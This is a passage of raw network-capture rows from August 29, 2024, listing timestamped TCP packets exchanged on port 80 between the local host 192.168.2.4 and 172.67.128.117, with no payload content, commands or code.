                                  Aug 29, 2024 23:42:08.462039948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462070942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462083101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462146997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462188959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462189913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462203026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462234974 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462246895 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462249994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462263107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462272882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462292910 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462302923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462330103 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462340117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462352037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462363005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462384939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462409019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462412119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462419987 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462430954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462462902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462487936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462515116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462532043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462543964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462555885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462578058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462604046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462630987 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462642908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462680101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462697983 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462712049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462723017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462733984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462738037 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462766886 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462790012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462922096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462934017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462944031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462955952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462966919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462975025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463005066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463068962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463080883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463090897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463103056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463109016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463115931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463128090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463129997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463139057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463157892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463184118 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463224888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463242054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463253975 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463265896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463268042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463278055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463290930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463296890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463301897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463323116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463335991 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463506937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463522911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463534117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463545084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463555098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463555098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463567019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463577986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463583946 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463592052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463615894 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463629007 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463644028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463654995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463665009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463676929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463686943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463695049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463696957 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463701010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463717937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463726044 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463753939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463773966 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464044094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464093924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464123964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464135885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464168072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464199066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464210033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464220047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464242935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464272976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464306116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464318991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464351892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464363098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464374065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464378119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464386940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464418888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464437008 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464442968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464453936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464495897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464499950 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464507103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464519978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464529037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464540005 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464565039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464586020 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464628935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464648008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464658022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464673042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464688063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464709997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464759111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464776039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464787006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464801073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464801073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464818954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464819908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464832067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464838028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464849949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464850903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464862108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464876890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464879990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464891911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464901924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464905977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464917898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464920998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464948893 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464971066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.548691988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548707962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548718929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548736095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548751116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548760891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548774004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548794985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.548813105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548986912 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.548986912 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549417973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549513102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549524069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549535036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549570084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549576998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549581051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549593925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549608946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549618006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549637079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549664021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549763918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549774885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549787045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549799919 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549823046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549832106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549838066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549845934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549851894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549856901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549868107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549881935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549892902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549905062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549935102 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549946070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549967051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549978018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549988985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549993992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550021887 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550046921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550542116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550560951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550571918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550602913 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550614119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550646067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550657988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550668955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550682068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550699949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550729036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550760984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550771952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550784111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550793886 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550795078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550823927 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550844908 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550885916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550898075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550908089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550919056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550928116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550931931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550945997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550968885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551052094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551095009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551105976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551136971 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551161051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551162958 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551191092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551203012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551239967 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551337004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551347971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551358938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551372051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551382065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551400900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551404953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551414013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551425934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551433086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551445961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551455975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551456928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551482916 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551497936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551583052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551592112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551604033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551615000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551625967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551634073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551665068 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551821947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551832914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551842928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551853895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551862955 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551898003 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551978111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551989079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552007914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552016973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552016973 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552042961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552057028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552234888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552246094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552254915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552270889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552280903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552282095 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552295923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552306890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552306890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552320957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552333117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552335024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552342892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552346945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552356005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552366018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552376032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552377939 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552388906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552396059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552400112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552411079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552411079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552432060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552454948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552809954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552819967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552829981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552856922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552865982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552876949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552880049 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552886009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552897930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552911043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552939892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552961111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552987099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552995920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553030968 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553061008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553071022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553080082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553090096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553102016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553109884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553128004 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553132057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553152084 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553179026 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553188086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553198099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553229094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553244114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553256989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553292036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553309917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553322077 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553330898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553354025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553390980 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553399086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553409100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553417921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553428888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553446054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553458929 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553474903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553486109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553519964 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553534985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.553560972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553570986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.553606987 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.637409925 CEST8049730172.67.128.117192.168.2.4
